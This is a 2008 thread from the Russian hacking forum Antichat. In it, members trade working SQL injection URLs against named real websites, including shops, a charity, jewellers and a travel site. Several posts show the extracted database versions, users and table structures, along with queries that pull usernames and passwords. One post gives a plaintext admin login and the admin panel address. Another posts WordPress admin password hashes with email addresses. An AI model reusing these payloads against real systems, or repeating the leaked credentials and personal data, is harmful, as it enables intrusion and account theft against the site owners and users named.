HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 18.11.2008, 21:58
Chaak
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
С нами: 9443906

Репутация: 3313


По умолчанию

Инъекция:
Цитата:
http://www.srpska.ru/article.php?nid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
Инфо:
Цитата:
Database Version: 5.0.60
Database name: db_ansimov_7
User name: dbu_ansimov_1@localhost
Структура:
Код:
categories:
   u_id
   cat_id
   cat_name
   cat_parent
   cat_descr

comm_members_list:
   comm_id
   u_id
   u_status
   comm_name

comments:
   comm_id
   comm_parent_id
   comm_parent_type
   comm_date
   comm_header
   comm_content
   comm_autor


Инъекция:
Цитата:
http://zvisti.com.ua/info.php?id=-1+union+select+1,2,3,4,5,666,7,8,9,10,11,12--
Инфо:
Цитата:
Database Version: 5.0.45
Database name: zvisti_db
User name: zvisti_user@localhost
Структуру лень раскрывать было...




Инъекция:
Цитата:
http://www.anshlagm.ru/a-info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20--
Инфо:
Цитата:
Database Version: 4.1.22-log
Database name: melbis
User name: melbis@10.0.1.201

Последний раз редактировалось ChaaK; 18.11.2008 в 22:52..
 
Ответить с цитированием

  #2  
Старый 18.11.2008, 22:10
Neoveneficus
Reservists Of Antichat - Level 6
Регистрация: 10.04.2008
Сообщений: 299
С нами: 9518726

Репутация: 405
По умолчанию

Код:
http://www.s7tour.ru/hotel.php?country=-1+union+select+1,version()/*

*** SQLBruter's report [ Tuesday 18th 0f November 2008 08:55:02 PM ] ***

[~] Names of tables bruteforce

http://www.s7tour.ru/hotel.php?country=-1 UNION SELECT 0,0 FROM hotel/*

http://www.s7tour.ru/hotel.php?country=-1 UNION SELECT 0,0 FROM news/*

http://www.s7tour.ru/hotel.php?country=-1 UNION SELECT 0,0 FROM poll_user/*
 
Ответить с цитированием

  #3  
Старый 18.11.2008, 22:42
foopi
Познающий
Регистрация: 26.10.2008
Сообщений: 50
С нами: 9232225

Репутация: 62
По умолчанию

http://www.s7tour.ru/hotel.php?country=-1+UNION+SELECT+1,concat_ws(0x3a,username,userpass) +FROM+poll_user/*
 
Ответить с цитированием

  #4  
Старый 19.11.2008, 02:41
plutus
Новичок
Регистрация: 03.11.2008
Сообщений: 25
С нами: 9221159

Репутация: 20
По умолчанию

http://irannag hme.com/viewalbums.php?artistId=-1+UNION%20SELECT%201,concat_ws(0x3a3a,username,pas sword),3,4,5,6,7,8,9,10+from+users--

http://mp3hunga ma.com/music/viewalbums.php?artistId=-5+UNION%20SELECT%201,concat_ws(0x3a3a,username,pas sword,email),3,4,5,6,7,8,9,10+from+users--
 
Ответить с цитированием

  #5  
Старый 19.11.2008, 11:02
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
С нами: 10198073

Репутация: 354
По умолчанию

https://www.keeperstop.com/pages.php?id=7+union+select+1,2,3,version(),5,6,7/*

5.0.44-log

Таблица registrations
 
Ответить с цитированием

  #6  
Старый 19.11.2008, 12:41
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
С нами: 10198073

Репутация: 354
По умолчанию

http://www.chicgemsetc.com/press_article.php?id=-21+union+select+1,2,3,4,5,version(),7,8,9--

5.0.67-log

Ювелирка вроде.
 
Ответить с цитированием

  #7  
Старый 19.11.2008, 19:06
Chaak
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
С нами: 9443906

Репутация: 3313


По умолчанию

Инъекция:
Цитата:
http://www.digitalcharity.com/m.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
Код:
DB Version - 5.0.51a-log
DB User    - charity_charity@localhost
DB Name    - charity_charity
Таблицы:
Цитата:
beg_begs
beg_categories
beg_manager
beg_scam
beg_unwelcome
beg_users
categories
games
ratings
Таблица beg_users:
Цитата:
ID
beg_id
ip
Таблица beg_manager:
Цитата:
id
name
passwd
Таблица beg_unwelcome:
Цитата:
ID
email

Только что-то пароли не подходят

Email:
Цитата:
http://www.digitalcharity.com/m.php?id=-1+union+select+1,2,email,4,5,6,7,8,9,10,11,12,13+f rom+beg_unwelcome--
Пароль:
Цитата:
http://www.digitalcharity.com/m.php?id=-1+union+select+1,2,passwd,4,5,6,7,8,9,10,11,12,13+ from+beg_manager--
 
Ответить с цитированием

  #8  
Старый 19.11.2008, 19:59
peonix
Познающий
Регистрация: 09.11.2008
Сообщений: 34
С нами: 9212732

Репутация: 2
По умолчанию

http://www.a-shop.ru/product_info.php?products_id=-1'+union+select+concat(username,char(58),password) +from+administrators/*

http://www.a-shop.ru/admin
bigmike : bigdent
 
Ответить с цитированием

  #9  
Старый 20.11.2008, 02:14
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
С нами: 10198073

Репутация: 354
По умолчанию

Ещё одна ювелирка вроде.

http://www.atlasjewellery.com/enquiry.php?id=-147+union+select+1,2,3,4,5,6,version()/*

5.0.41-community-log

Последний раз редактировалось Constantine; 26.11.2008 в 19:34..
 
Ответить с цитированием

  #10  
Старый 20.11.2008, 03:02
Sindicat
Новичок
Регистрация: 14.11.2008
Сообщений: 12
С нами: 9204703

Репутация: 10
По умолчанию

Красивый сайт нет слов ))

http://lineage2-rmt.com/news.php?id=-25+union+select+1,concat_ws(0x3a,table_schema,tabl e_name),3,4+from+information_schema.tables+limit+3 51,1--


http://lineage2-rmt.com/news.php?id=-25+union+select+1,concat(user_login,0x3a,user_pass ,char(32,32),user_nicename,char(32,32),user_email) ,3,4+from+asandcom_wordpress.wp_users+limit+1,1--

admin:$P$BkKicvsTytFhHOXTNGhYXCg25CvccO. admin zg@a-sand.com

zg:$P$BuYAHnmiu7Hx2ULVXEx1mMR8IyaSav/ zg zg@a-sand.com
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.